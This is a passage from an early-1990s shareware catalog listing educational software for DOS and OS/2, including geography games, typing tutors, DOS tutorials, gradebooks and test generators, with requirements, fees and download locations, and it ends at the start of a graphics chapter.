Shuttle Tracker. See full description on page 285. + + Product: World Name Game + Graphic Geography Game. See full description on page 283. + + + 13.3 Junior high + + Product: EQUALIZER [***] + Student and teacher test making and review. See full + description on page 285. + + Product: I.Q. Challenge [***] + Test knowledge in 5 categories, earn diploma. See full + description on page 377. + + Product: Q&A Study Aid + Comprehensive Computer Testing/Grading System. See full + description on page 296. + + Product: School-Mom [***] + Complete children's education software. See full description + on page 301. + + Product: Spell Games + Practice Spelling as an Olympic Game. See full description on + page 282. + + Product: STS26 + Space Shuttle Tracker. See full description on page 285. + + Product: TEACHER [***] + Home study aid, many subjects. Configurable. See full + description on page 287. + + Chapter 13, "Education" 284 + + + + Product: World Name Game + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: Robert L. Lloyd + Registration: $15.00 + Version: 6.10 (09-18-91) + User benefits: Unlimited assistance by mail. + Look for: availability unknown on BBSs; WNG2.EXE in IBMAPP forum + LIB 11 on CompuServe. + Download size: 300k + Description: + Provides a unique geography learning environment. Through a + game like environment the program promotes the study of place- + name geography. Over 200 of the world's capital cities are + randomly presented as a graphic depiction of the country and + surrounding area. Options include various size areas, adjacent + capitals, and latitude and longitude. The user is challenged to + enter the correct city or city and country name. Each user has + a record of his ten best scores. + + Product: WORLD29 + Global Mapping/tracking Geography. See full description on + page 301. + + Product: YRWAY [***] + Student study aid, fully configurable. See full description on + page 287. + + + 13.4 High school + + Product: ACCU Music Printer + Prints out sheet music, transposes, etc. See full description + on page 346. + + Product: EQUALIZER [***] + Student and teacher test making and review. See full + description on page 285. + + Product: FDplot [***] + A quick scientific function/data & stat plot. See full + description on page 286. + + Product: Fictionary [***] + The game of fantastic/farfetched definitions. See full + description on page 383. + + Product: I.Q. Challenge [***] + Test knowledge in 5 categories, earn diploma. See full + description on page 377. + + Product: PC-ECAP + AC Circuit Analysis program with graphics. See full + description on page 249. + + Chapter 13, "Education" 285 + + + + Product: Q&A Study Aid + Comprehensive Computer Testing/Grading System. See full + description on page 296. + + Product: Save the Planet + Ozone & greenhouse data, easy word processor. See full + description on page 298. + + Product: STS26 + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: Robert L. Lloyd + Registration: $10.00 + Version: 7.0 (10-08-90) + User benefits: Unlimited support by mail. + Look for: availability unknown on BBSs; STS26.ZIP in IBMAPP forum + LIB 13 on CompuServe. + Download size: 150k + Description: + Provides a method for tracking the flight of the space shuttle. + Additionally the user can learn the dynamics of space flight. + Provides default setting for a typical shuttle mission. It + allows the user to enter a variety of parameters to accurately + track a given mission. Launch is permitted from Kennedy Space + Center, Vandenberg, any of the three Soviet launch sites, or + from South America. Each launch site provides its own default + launch parameters. On orbit parameters can be varied. + + Product: TEACHER [***] + Home study aid, many subjects. Configurable. See full + description on page 287. + + Product: World Name Game + Graphic Geography Game. See full description on page 283. + + Product: WORLD29 + Global Mapping/tracking Geography. See full description on + page 301. + + Product: YRWAY [***] + Student study aid, fully configurable. See full description on + page 287. + + Product: YRWAYx.ZIP [***] + Student aid, configurable to many languages. See full + description on page 287. + + Chapter 13, "Education" 286 + + + + 13.5 College + + Product: EQUALIZER [***] + Needs: IBM PC, DOS 3.0 or better. + Author: Nine-Patch Software + Registration: $20.00 + Version: 1.03 (03-20-92) + User benefits: Master disks, mail support. + Look for: availability unknown on BBSs. + Download size: 400k + Description: + Students working individually or in groups become aware of + their thinking as they translate class notes and reading + assignments into high quality test questions. In the process + they are converted from passive pupils into active scholars. + Teachers can prepare instructional question files in specific + topics for students to review at three levels of thinking and + to start the above writing process. Sample instructional + question files (IQF) are included. + + Product: FDplot [***] + Needs: IBM PC, DOS 2.0 or better. CGA monitor. Hard disk + recommended. + Author: Abri TEchnologies, Inc. + Registration: $15.00 + Version: 1.2 (02-27-92) + User benefits: Three months support. + Look for: availability unknown on BBSs; FDPLOT.EXE in SCIENCE + forum LIB 8 on CompuServe. + Download size: 74k + Description: + A handy/fuss-free scientific function and data plotting + software intended for upper high-school or college students and + instructors. It is menu driven, fast and easier to use than + most graphics calculators. A linear regression statistics + program is included. + + Product: Fictionary [***] + The game of fantastic/farfetched definitions. See full + description on page 383. + + Product: I.Q. Challenge [***] + Test knowledge in 5 categories, earn diploma. See full + description on page 377. + + Product: KWIKSTAT + Statistical Data Analysis. See full description on page 255. + + Product: PathProj + Path Projection for Ridge Regression. See full description on + page 256. + + Chapter 13, "Education" 287 + + + + Product: PC-ECAP + AC Circuit Analysis program with graphics. See full + description on page 249. + + Product: RXridge + Ridge Regression Computations & Graphics. See full description + on page 256. + + Product: RXtraces + Interactive Ridge Regression TRACE Displays. See full + description on page 257. + + Product: Save the Planet + Ozone & greenhouse data, easy word processor. See full + description on page 298. + + Product: TEACHER [***] + Needs: IBM PC, DOS 3.3 or better. + Author: Tinker Software + Registration: $15.00 + Version: 2.0A (11-23-91) + User benefits: Unlimited fax/BBS support. + Look for: TEACH20A.ZIP on BBSs (call 206-852-7708 to download it + at no charge); TCH20A.ZIP in IBMAPP forum LIB 11 on CompuServe. + Download size: 152k + Description: + Designed to aid the student in studying for tests. It is + designed to be fully configurable with the ability to add or + delete test problems. I consider it useful to most students as + various subjects are covered for study, also with the ability + to change the problems it can be tailored to meet any age + requirement and can GROW with the students abilities. + + Product: YRWAY [***] + Needs: IBM PC, DOS 3.0 or better. + Author: Tinker Software + Registration: $15.00 + Version: 1.0 (01-24-92) + User benefits: Unlimited fax/BBS support. + Look for: YRWAY1.ZIP on BBSs (call 206-852-7708 to download it at + no charge); YRWAY1.ZIP in IBMAPP forum LIB 11 on CompuServe. + Download size: 89k + Description: + Designed to aid the student in studying. It is designed to be + easily configurable with the ability to add or delete their own + SUBJECTS and ANSWERS. With the ability to change the Subjects + it can be tailored to meet any age needs and then can GROW with + the student. It can also be used as a "TRIVIA" type game, by + adding your questions. + + Chapter 13, "Education" 288 + + + + Product: YRWAYx.ZIP [***] + Needs: IBM PC, DOS 3.3 or better. Mouse, EGA monitor optional. + Author: Tinker Software + Registration: $15.00 + Version: 2.2 (03-10-92) + User benefits: Unlimited support. Lifetime registration. + Look for: YRWAY22.ZIP on BBSs (call 206-852-7708 to download it + at no charge); YRWY22.ZIP in IBMAPP forum LIB 11 on CompuServe. + Download size: 135k + Description: + Self help study program with the ability to work in many + foreign languages. You supply the Subjects/Answers and Prompts. + Fun and entertaining, it can be easily changed to match the + users knowledge level. + + + 13.6 Literature + + Product: Babble! + Creativity tool for writers. See full description on page 130. + + Product: Creativity Package [***] + Become more creative. See full description on page 130. + + Product: JEPRS (Jeepers!) + Bibliographic Database Management System. See full description + on page 156. + + Product: Poetry Generator [***] + Turn your computer into a poet! See full description on + page 131. + + + 13.7 Foreign language + + Product: Crossword Creator + Multi-lingual crossword puzzle editor. See full description on + page 381. + + Product: REXL-Lazarillo de Tormes + Needs: IBM PC, DOS 2.0 or better. 256k RAM. + Author: REXL, 619-481-0781 + Registration: $24.00 + Version: 1.1 (12-03-91) + User benefits: Printed manual and description of book, telephone + support, upgrade and new product notification. + Look for: availability unknown on BBSs; REXL.ZIP in FLEFO forum + LIB 0 (multiple files) on CompuServe. + Download size: 800k + Description: + This version of the original Spanish edition of "Lazarillo de + Tormes", a classic Spanish novel, displays text and the pop-up + English translations of words and idiomatic expressions that + exactly match the meaning of the text. Improve your Spanish + + Chapter 13, "Education" 289 + + + + reading skills and enjoy reading this book without the hassle + of using a dictionary to look up words and idiomatic + expressions that you do not know. + + + 13.8 Computers + + See also: Business, Training aids (page 211). + + Product: Computer Trivia Quiz + Needs: IBM PC, DOS 2.1 or better. 320k RAM. + Author: Shoestring Software + Registration: $20.00 + Version: 1.0 (09-07-91) + User benefits: Printed Manual, Latest Version on Disk, T-Shirt, + 180 days mail support. + Look for: QUIZ.ZIP on BBSs; QUIZ.ZIP in IBMNEW forum LIB 8 on + CompuServe; QUIZ.ZIP in IBMPC RTC LIB 7 on GEnie. + Download size: 200k + Special instructions: Product distribution restricted to the + United States. + Description: + An entertaining and enlightening way to increase and/or test + your computer literacy. Subjects range from stone-age + computing, famous founders, milestones, events, machines and + terms to the latest innovations. Can be played by one to six + players. Questions are presented in multiple choice format. For + those that are stumped, don't know the correct answer or just + want to know more about the subject, there is an extremely + informative hint. Try this! + + Product: PC-GLOSSARY + Needs: IBM PC, DOS 2.1 or better. Hard disk or high density disk + drive. + Author: Disston Ridge, Inc., 813-323-0961 + Registration: $29.00 + Version: 4.1 (01-01-92) + User benefits: Latest version, free CompuServe and telephone + support, 50% discount on future updates. + Look for: GLOSRY.ZIP on BBSs; GLOSRY.ZIP in IBMAPP forum LIB 11 + on CompuServe; GLOSRY.ZIP in IBMPC RTC LIB 0 on GEnie. + Download size: 340k + Description: + An educational desktop reference program to help keep abreast + of the ever-changing terminology in the world of + microcomputers. Hundreds of terms, acronyms, buzzwords, and + abbreviations are defined with many useful reference tables at + your fingertips. Not just one or two line definitions; each + entry has an entire screen full of related information and is + cross-referenced to other entries. + + Chapter 13, "Education" 290 + + + + Product: The World's Simplest Computer + Needs: IBM PC, DOS 2.0 or better. EGA monitor; any .GIF file + viewer. + Author: Langin Software, 618-532-4899 + Registration: $19.00 + Version: 1.00 (03-28-91) + User benefits: CompuServe/mail support. + Look for: availability unknown on BBSs; SIMPLE.ZIP in IBMAPP + forum LIB 11 on CompuServe. + Download size: 546k + Description: + Not a program. This is a 66-page "book" of GIF files which + illustrates the basic operations of personal computers. It is + for (1) beginning computer users; (2) intermediate computer + users who "just don't understand" what goes on inside a + computer; (3) expert users who need to train the first two + groups; and, (4) computer retailers who can use it as a slide + show. + + 13.8.1 Operating system tutors + + Product: DOS Summary [***] + Needs: IBM PC, DOS 2.0 or better. + Author: Computer Knowledge + Registration: $0.00 + Version: 1.01 (02-23-91) + User benefits: Support. + Look for: DOSSUM.ZIP on BBSs; DSUM01.ZIP in IBMSYS forum LIB 1 on + CompuServe. + Download size: 120k + Description: + A DOS command summary program. When started from DOS you have + the option of accessing either an alphabetical menu of DOS + commands or a menu where commands are grouped by function. A + second way of accessing a command is by starting the program + with a command name as a parameter. Finds the closest match to + the command you entered -- so exact spelling is not necessary. + Only DOS commands are in this version; batch commands and + CONFIG.SYS commands are not. DOS versions to 4.01 supported. + + Chapter 13, "Education" 291 + + + + Product: DOS Summary (Hypertext) [***] + Needs: IBM PC, DOS 2.0 or better. + Author: Computer Knowledge + Registration: $25.00 + Version: 2.0 (02-15-92) + User benefits: Printed manual with command examples not found in + the software, master disks, bonus utilities. Shareware disks + of other products. + Look for: DOSSUM20.ZIP on BBSs; DSUM02.ZIP in IBMSYS forum LIB 1 + on CompuServe. + Download size: 150k + Description: + DOS Summary is a hypertext tutorial and reference product which + covers all DOS commands and drivers through MS-DOS 5.0. Also + added are tutorials covering memory management and how DOS + starts. The program can be used in standalone or resident mode. + When started, you have the option of an alphabetical command + menu or a menu where commands are grouped by function. You may + also start the program with a DOS command name as a parameter + and be taken immediately to that command. + + Product: DosEA 1--For Absolute Beginners + Needs: IBM PC, DOS 2.0 or better. + Author: Langin Software, 618-532-4899 + Registration: $10.00 + Version: 2.00 (05-19-91) + User benefits: CompuServe/mail support. + Look for: availability unknown on BBSs; DEA1.ZIP in IBMAPP forum + LIB 11 on CompuServe. + Download size: 112k + Description: + A series of hypertext tutorials on MS-DOS. Demonstrates the + hypertext system used in the remainder of the series. Supports + a mouse. + + Product: DosEA 2--What is DOS? + Needs: IBM PC, DOS 2.0 or better. + Author: Langin Software, 618-532-4899 + Registration: $10.00 + Version: 2.00 (05-19-91) + User benefits: CompuServe/mail support. + Look for: availability unknown on BBSs; DEA2.ZIP in IBMAPP forum + LIB 11 on CompuServe. + Download size: 142k + Description: + Second in the DosEA series. A background on how computers and + MS-DOS were developed is given. "Operating system" is + described. The DOS prompt and the DOS commands are introduced. + Hands-on practice is provided in recognizing the DOS prompt and + changing default disk drives. A "hyperbook": Has chapters like + a book, but is written in hypertext. Start the series here or + with any DosEA program: Each one stands alone. + + Chapter 13, "Education" 292 + + + + Product: DosEA 3--10 Easy Commands + Needs: IBM PC, DOS 2.0 or better. + Author: Langin Software, 618-532-4899 + Registration: $10.00 + Version: 2.00 (05-19-91) + User benefits: CompuServe/mail support. + Look for: availability unknown on BBSs; DEA3.ZIP in IBMAPP forum + LIB 11 on CompuServe. + Download size: 154k + Description: + Third in the DosEA series of hypertext tutorials on MS-DOS. + DosEA 3 describes and provides hands-on practice for 10 easy + DOS commands: CLS, DATE, DIR, EXIT, PROMPT, TIME, TYPE, VER, + VERIFY, and VOL. The program screens for errors: If the user + enters a command wrong, it is not accepted. If three errors + are made, the program demonstrates how to enter the command. A + properly entered command is executed by the user's DOS. + + Product: DosEA 4--Find That Command! + Needs: IBM PC, DOS 2.0 or better. + Author: Langin Software, 618-532-4899 + Registration: $10.00 + Version: 2.00 (05-19-91) + User benefits: CompuServe/mail support. + Look for: availability unknown on BBSs; DEA4.ZIP in IBMAPP forum + LIB 11 on CompuServe. + Download size: 116k + Description: + Fourth in the DosEA series of hypertext tutorials. This + utility helps the user find the right DOS commands to perform + certain tasks. Memory jolting words are used to direct users + to the appropriate commands. + + Product: DosEA 5--All About MS-DOS 5.0 + Needs: IBM PC, DOS 2.0 or better. + Author: Langin Software, 618-532-4899 + Registration: $10.00 + Version: 1.00 (07-05-91) + User benefits: CompuServe/mail support. + Look for: availability unknown on BBSs; DEA5.ZIP in IBMAPP forum + LIB 11 on CompuServe. + Download size: 128k + Description: + Fifth in the DosEA series of hypertext tutorials on DOS. This + is a reference of the additions, deletions, and changes in MS- + DOS 5. It makes feature-by-feature, command-by-command, + switch-by-switch comparisons between MS-DOS 5 and previous + representative versions of DOS. It is not only for beginners, + but also experienced computer users; those that have MS-DOS 5 + and those that do not. In short, anyone who is interested in + the changes in MS-DOS 5. + + Chapter 13, "Education" 293 + + + + Product: DosEA 6--Switched on DOS + Needs: IBM PC, DOS 2.0 or better. + Author: Langin Software, 618-532-4899 + Registration: $10.00 + Version: 1.00 (09-14-91) + User benefits: CompuServe/mail support. + Look for: availability unknown on BBSs; DEA6.ZIP in IBMAPP forum + LIB 11 on CompuServe. + Download size: 138k + Description: + A hypertext database of the 238 DOS command switches and + parameters from versions 1.0 to 5.0. (MS-DOS 5.0 added 85 + switches and other parameters!) Access them by command, DOS + version, switch, parameter, or name. Nothing else like it. A + "must have" for "power users." + + Product: Stringer/2 + Needs: IBM AT (80286), OS/2 1.0 or better. + Author: Richard W. Adams + Registration: $5.00 + Version: 1.02 (06-06-90) + User benefits: Eligibility for free upgrades. + Look for: STRIO102.ZIP on BBSs; STRIO1.ZIP in IBMNEW forum LIB 5 + on CompuServe. + Download size: 15k + Description: + Draws string art in a Presentation Manager window. Use as a + demonstration, or to help train new users on OS/2. Also + helpful for showing machine capabilities or taking advantage of + idle CPU time. Options to change color & speed. Hypnotic & + addicting! + + Product: TUTOR.COM [***] + Needs: IBM PC, DOS 2.0 or better. + Author: Computer Knowledge + Registration: $15.00 + Version: 4.5 (05-01-91) + User benefits: Printed manual, master disks. + Look for: TUTCOM.ZIP on BBSs; TUTCOM.ZIP in IBMAPP forum LIB 11 + on CompuServe. + Download size: 300k + Description: + A minicourse in microcomputing covering the basics of a variety + of topics including: Computer History, Introduction to DOS, + Computer Terminology, Subdirectories, Hardware, Batch Files, + the Keyboard, and Introduction to Programming. Material is + presented in a series of screens and the user has the ability + to move forward or backward through the tutorials, or jump to + selected locations using a menu. Short quizzes test you on your + knowledge but you may bypass these when reviewing. + + Chapter 13, "Education" 294 + + + + 13.8.2 Typing tutors + + Product: PC-FasType/CGA + Needs: IBM PC, DOS 3.0 or better. CGA monitor. + Author: Trendtech Corporation, 201-694-8622 + Registration: $25.00 + Version: 4.3 (08-01-91) + User benefits: Disk with latest version; Printed 80-page User's + Guide, Money-back-guarantee. + Look for: FSTYPC43.ZIP (multiple files) on BBSs. + Download size: 250k + Description: + A professional menu-driven MS-DOS typing tutorial for PC's + equipped with any of 3 popular keyboard styles. Program + displays image of keyboard and prompts for letters and words to + type. New version has many added features. Options to type your + own text files, or choose your own letters for drills. + Features: save settings, save statistics, print history; Open + Typing lets you practice WP skills; type Long Paragraphs + without keyboard display; Timed Exercises, KAPS for Kids; + Hidden keys, sound, more... + + Product: PC-FasType/MONO + Needs: IBM PC, DOS 3.0 or better. + Author: Trendtech Corporation, 201-694-8622 + Registration: $25.00 + Version: 1.3 (08-01-91) + User benefits: Disk with latest version; 80-page printed User's + Guide; money-back guarantee. + Look for: FSTYPM13.ZIP (multiple files) on BBSs. + Download size: 250k + Description: + This MONOCHROME version of PC-FasType/CGA will run on any PC. + Uses character graphics to display keyboards. Functionality + identical to the CGA version. Ideal for portables, laptops, and + notebook PC's. See PC-FasType/CGA description for more + details. + + Product: TOUCH TYPE TUTOR + Needs: IBM PC, DOS 3.0 or better. + Author: Gray Design Associates + Registration: $10.00 + Version: 3.4 (05-14-91) + User benefits: Latest registered version. + Look for: availability unknown on BBSs; TTTUTO.EXE in IBMAPP + forum LIB 11 on CompuServe. + Download size: 120k + Description: + Super easy-to-use touch typing tutor for any monitor, color or + monochrome. Has 3 modes of operation: Tutorial, Speed Test and + Game. Tutorial mode presents a series of lessons which reacts + to your typing skill & feeds you with sentences designed to + improve your slowest and most error-prone keys! Speed Test is + + Chapter 13, "Education" 295 + + + + suitable for rating professional typists' speeds. Game mode is + highly addictive! + + + 13.9 Teachers + + Product: BESTTEST + Needs: IBM PC, DOS 2.1 or better. + Author: WiseWare + Registration: $50.00 + Version: 1.5 (06-01-91) + User benefits: Bound version of users manual, disk with latest + program release. + Look for: availability unknown on BBSs; BSTTST.EXE in EDFORUM + forum LIB 2 on CompuServe. + Download size: 218k + Description: + Makes test preparation easy. Supports all standard item + formats: essay, fill-in, true/false, multiple choice, and + matching. Full word wrap. Items up to 25, 43 or 50 lines in + length (depending on your monitor). Up to 1000 test items in a + single file. Easy export of items from one file to another. + The program supports bold, underline, subscript and + superscript. You may use any character in the extended ASCII + set. Choose test items manually or use the auto-select + function. On-line help. + + Product: Crossword Clipper for Windows + Crossword puzzle layout/publishing tool. See full description + on page 124. + + Product: Crossword Creator + Multi-lingual crossword puzzle editor. See full description on + page 381. + + Product: CROSSWORD POWER + Make crossword puzzles from your words/clues. See full + description on page 382. + + Product: FASTFILE + Laptop database for business, school, home. See full + description on page 141. + + Chapter 13, "Education" 296 + + + + Product: LessonPlanZ + Needs: IBM PC, DOS 2.1 or better. IBM Graphics or LaserJet + printer. + Author: Unicorn Software Limited, 219-563-HOME + Registration: $25.00 + Version: 2.10 (01-07-92) + User benefits: Master disks, phone/BBS/mail support. + Look for: LPLANZ21.ZIP on BBSs (call 317-784-2147 to download it + at no charge); LPLANZ.ZIP in EDFORUM forum LIB 0 on CompuServe. + Download size: 180k + Description: + Lesson planning made easy! The program has separate areas for + Goals, Objectives, Methods, Evaluations, and Materials. Each + area can be from 1 to 5000 lines long! Header infromation + holds title, dates covered, number of days, subject and more. + Default settings for School and Teacher Name. Prints a variety + of reports including a basic lesson plan, separate areas, a + custom listing, and folder labels to hold your plans! Uses + common WP commands, menu driven, mousable, and on line help. + + Product: PC-CAI + Write Computer Driven Tutorial on any Subject. See full + description on page 299. + + Product: Q&A Study Aid + Needs: IBM PC, DOS 2.1 or better. External flat-file editor, + 256k RAM. + Author: Quid Pro Quo Software + Registration: $20.00 + Version: 3.90 (09-01-91) + User benefits: Notification of upgrades; upgrades available for + $5.00 S&H, elimination of 'Unregistered' notices. + Look for: Q&ASA*.ZIP on BBSs (call 517-695-9952 to download it at + no charge); QASA*.ZIP in IBMAPP forum LIB 11 on CompuServe. + Download size: 113k + Description: + A computer-based test creation and execution system. Test + databases of up to 40000 questions are created with external + editor using simple syntax. Program contains compiler and test + interpreter, presents the compiled test, scores all answers and + optionally records results in a score file. All data is + encrypted or password-protected. Score files may be exported. + Supports all question types except essay. Has weighting, letter + grade associations, correct answer display, more. + + Product: SURVEY POWER + Demographic and correlation survey analysis. See full + description on page 257. + + Product: WORDSEARCH POWER + Create word searches & vocabulary bingo cards. See full + description on page 385. + + Chapter 13, "Education" 297 + + + + 13.9.1 Gradebooks + + Product: GRADE BOOK POWER + Needs: IBM PC, DOS 2.1 or better. 512k RAM. + Author: WISCO Computing, 715-423-8189 + Registration: $61.00 + Version: 3.00 (01-02-92) + User benefits: Latest version, printed manual, telephone and BBS + support, supporting Word Perfect macros. + Look for: GRADEBKL.ZIP on BBSs (call 715-435-3855 to download it + at no charge). + Download size: 245k + Description: + Many special options for elementary and secondary teachers. Use + either two-9 week terms or 3-6 week terms per semester. Create + over 20 different reports. Individual progress reports can + include assignment date, title, letter grade, points earned, + points possible, grading trend, category averages, personal and + general comments, absences, missing and excused assignments, + parent signature, grade override, grading scale, weighting, + semester exam, throw out low exam, extra credit, term & + semester grade. + + Product: VAR Grade + Needs: IBM PC, DOS 2.0 or better. 384K RAM. Hercules or CGA + monitor. + Author: VARed Software, 805-523-7546 + Registration: $50.00 + Version: 4.66 (12-11-91) + User benefits: Current version with printed manual, as well as + the next major version (and manual). + Look for: GRADE*.ZIP (multiple files) on BBSs; GRADE*.ZIP in + ZNT:PBS forum LIB 0 (multiple files) on CompuServe. + Download size: 600k + Description: + A full-featured program for recording, plotting, and analyzing + scores on assignments and attendance. You can have any number + of students, assignments, sections, or classes. Can handle + numbers, letters, and extra credit. It can automatically sum, + average, discard, and weight scores. A variety of statistical + tests and plots can be done on your grades. You can sort + students, import/export grades, and define your own grading + system. The program is extremely flexible. + + + 13.10 Science + + Product: Ecomaster [***] + Ecology simulation for 1 or more players. See full description + on page 387. + + Product: METRIC-X + Gov't Reviewed Metric-English Conversion Util. See full + description on page 211. + + Chapter 13, "Education" 298 + + + + Product: PC-TRACK [***] + Satellite Tracking Package. See full description on page 318. + + Product: Save the Planet + Needs: IBM PC, DOS 2.0 or better. 512k RAM, CGA or Hercules + monitor. + Author: Save the Planet Software, 303-641-5035 + Registration: $24.95 + Version: 2.50 (01-31-92) + User benefits: Quick reference guide, master disks, support, + bonus utilities, upgrade discounts. + Look for: STP250.ZIP on BBSs (call 919-434-8664 to download it at + no charge); SAVEP.EXE in OUTDOORS forum LIB 16 on CompuServe. + Download size: 335k + Description: + Learn about ozone depletion and global warming with an + interesting presentation using graphics, text, and maps. Up-to- + date global data - population explosion, deforestation, + atmospheric chemistry - on issues affecting you, your kids, the + planet. Take action, using STP's resources: + + Built-in word processor, using Congressional database, for + quick letters to Washington. Greenhouse simulator, + environmental groups, voting scores, new legislation, + recycling, shopping, investing, energy saving ideas. + + + 13.11 History + + Product: CHRONOS [***] + Interactive historical timelines. See full description on + page 299. + + Product: On This Day + Needs: IBM PC, DOS 2.1 or better. + Author: The Software Construction Co. + Registration: $25.00 + Version: 1.1 (11-26-91) + User benefits: Update notification, latest version. + Look for: OTD_11.ZIP on BBSs (call 508-454-3864 to download it at + no charge); OTD.ZIP in IBMSYS forum LIB 7 on CompuServe. + Download size: 122k + Description: + This event DB and printing program accepts the date you are + interested and it prints the events that happened on that day + in history: + * Astronomical Events (Moon Phases, Solstices, etc) + * Birthdays of famous people + * Religious Holidays (Jewish, Christian, etc) + * Much more + + Uses text file databases, meaning you can edit them with your + favorite text editor (though they can be read in compressed + form). A personal events file is also supported. + + Chapter 13, "Education" 299 + + + + 13.12 Software tools + + 13.12.1 For other + + Product: CHRONOS [***] + Needs: IBM PC, DOS 2.1 or better. + Author: Cascoly Software, 206-523-6135 + Registration: $30.00 + Version: 2.05 (03-30-92) + User benefits: Phone/CompuServe support. + Look for: availability unknown on BBSs; CHRNOS.ZIP in IBMAPP + forum LIB 11 on CompuServe. + Download size: 132k + Description: + How old was Paul Revere when he rode into history? How many + years separated Michelangelo and Cortez? This program lets you + sort and select by individual people and events, or groups and + factions, to develop new insights and trace patterns across + different eras and cultures. Useful to history and art + students, teachers, genealogists, lawyers, writers or anyone + interested in exploring historical relations or cultural + events. Prints wall charts. + + Product: HyperPAD + The HyperMedia Platform for MS-DOS. See full description on + page 273. + + Product: MakeDemo + Presentation program with interactive menuing. See full + description on page 167. + + Product: PC-CAI + Needs: IBM PC, DOS 2.1 or better. CGA monitor. + Author: TexaSoft, 214-291-2115 + Registration: $49.00 + Version: 2.05 (05-24-91) + User benefits: Printed Manual, Bonus Examples, discounted + updates, newsletter. + Look for: PCCAI2.ZIP on BBSs; PCCAI2.ARC in IBMAPP forum LIB 11 + on CompuServe. + Download size: 250k + Description: + A computer assisted instructional tool. This award-winning + authoring language allows you to write computer driven + tutorial, tests, rolling demos, and similar programs. Use + color, graphics, animation, questions and answers, menuing and + branching. Respond to input from users, record answers, grade + results. This is only CAI type program to win 4 stars (highest + rank) in "Tools For Teachers" in Shareware Magazine. + + Chapter 13, "Education" 300 + + + + Product: PREP + Needs: IBM PC, DOS 2.1 or better. 512k RAM. + Author: Southwind Software + Registration: $35.00 + Version: 1.2 (08-23-91) + User benefits: User Guide, Support by Mail or Compuserve. + Look for: availability unknown on BBSs; PREP.ZIP in IBMAPPS forum + LIB 11 on CompuServe. + Download size: 240k + Description: + A Multiple Choice, True/False Test/Drill Program generator. + Question Sets may contain up to 200 questions. Sub-sets may be + created from Master Question Sets. Each question may contain 5 + choices with responses for questions answered correctly and + incorrectly. Extensive review opportunities of individual and + group results (up to 300 individuals). Also, generates ASCII + files for manual testing and answer entry. Context Sensitive + Help throughout. + + Product: Technical Editor + DOS/OS2 Programmers/Text editor (VIRTUAL). See full + description on page 120. + + + 13.13 Other + + Product: 3 ball Juggler + Juggling tutor and arcade-game like simulator. See full + description on page 373. + + Product: CROSSDOWN + Solve and construct professional crosswords. See full + description on page 381. + + Product: Dad's Choice [***] + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: Motes Educational Software, 501-442-5652 + Registration: $15.00 + Version: 2.0 (09-09-91) + User benefits: Mail support. Shareware disks of other programs. + Look for: availability unknown on BBSs; DAD20.ZIP in IBMAPP forum + LIB 11 on CompuServe. + Download size: 93k + Description: + This program was designed for children who are interested in + Math and Engineering. It has arcade games for math and + multilevel instruction for addition, subtraction, + multiplication, division, and basic algebra. It also has a + graphics option that allows you to draw lines, boxes, circles, + arcs, text, and macros. These can be painted, edited, stored, + animated, and printed using your screen dump utility. + + Chapter 13, "Education" 301 + + + + Product: LEANER + Weight Control Charting & Motivation Program. See full + description on page 202. + + Product: LessonPlanZ + Lesson planning made EZ. See full description on page 295. + + Product: Q&A Study Aid + Comprehensive Computer Testing/Grading System. See full + description on page 296. + + Product: School-Mom [***] + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: Motes Educational Software, 501-442-5652 + Registration: $25.00 + Version: 3.58 (12-31-91) + User benefits: Printed manual, mail support, bonus utilities. + Look for: availability unknown on BBSs; MOM358.ZIP in IBMAPP + forum LIB 11 on CompuServe. + Download size: 122k + Description: + This is a complete education program for kids of all ages + written by Dr. Andrew Motes. With this software you can have + fun while you learn. It has modules for Math, Music + Composition, English, Spelling, Art, Telling Time, and even an + exam generator. Each module has multiple learning levels so + your child will never outgrow it. + + Product: VERSAMAP [***] + Needs: IBM PC, DOS 3.0 or better. 640k RAM. + Author: Charles H. Culberson, 302-731-0694 + Registration: $15.00 + Version: 1.16 (02-21-92) + User benefits: Master disks, phone/CompuServe/mail support, bonus + maps. + Look for: VMAP.ZIP on BBSs; VMAPS.EXE in IBMAPP forum LIB 7 on + CompuServe. + Download size: 334k + Description: + Draws outline maps on 8 map projections using the digital map + databases Micro World Data Bank II and The World Digitized. + Maps can be printed on the screen, on dot-matrix or laser + printers, as bit-mapped .PCX files, as Lotus .PIC files, or as + ASCII files, for use with paint programs, word processors, and + presentation graphics or technical graphing programs. Text may + be added to maps using Courier or Helvetica fonts supplied with + the program. A digital map database is supplied with the + program. + + Chapter 13, "Education" 302 + + + + Product: WORLD29 + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: Robert L. Lloyd + Registration: $10.00 + Version: 2.9D (12-11-91) + User benefits: One free update on user provided disk. Discounts + on additional updates. + Look for: availability unknown on BBSs; WORLDX.EXE in IBMAPP + forum LIB 7 on CompuServe. + Download size: 360k + Description: + Puts a globe in your computer. It provides rapid maps of any + place on earth. Over 200 National capitals are located the user + can add locations and overlay maps to meet his own needs. + Additionally, it provides a global tracking system which allows + the user to track anything that can be given a latitude and + longitude, anywhere in the world. + + Provides sample Hurricane tracks, sample map overlays, and + sample Custom Location files. Search by Name or Point and + shoot. + + Chapter 14, "Graphics" 303 + + + + + + Chapter 14 + Graphics + + See also: Communications, Modem-based graphics applications + (page 167). + + + 14.1 Viewing programs + + Product: Listico + Needs: IBM PC, DOS 3.0 or better. EGA monitor. + Author: Gateway Software + Registration: $15.00 + Version: 2.00 (05-01-91) + User benefits: Registration Code is mailed out. + Look for: LICO20.ZIP on BBSs; LICO20.ZIP in WIN forum LIB 0 on + CompuServe; LICO20.ZIP in IBM RTC LIB 0 on GEnie. + Download size: 120k + Description: + Contains two icon viewing programs, one for DOS and one for + Windows. Displays alphabetically up to 4000 icon files. With + the DOS version, you can easily find an icon in a large library + and launch an icon editor. + + Product: Movie Guide + Catalog Movies with full multimedia support. See full + description on page 329. + + Product: Paint Shop Pro + Image displayer, converter, editor. Scrn Cap. See full + description on page 311. + + Product: PixFolio Image Catalog System + Windows Image Cataloging System. See full description on + page 12. + + Product: PlotManager + Plot Management Utility. See full description on page 309. + + Chapter 14, "Graphics" 304 + + + + Product: Show Partner Lite + Needs: IBM PC, DOS 2.1 or better. 384k RAM, CGA or Hercules + monitor. + Author: Brightbill-Roberts and Company, Ltd., 800-444-3490 + Registration: $79.00 + Version: 3.7 (09-01-91) + User benefits: Latest version, printed/bound manuals, free 800# + tech support, special offers and discounts. + Look for: SPLIT*.ZIP (multiple files) on BBSs 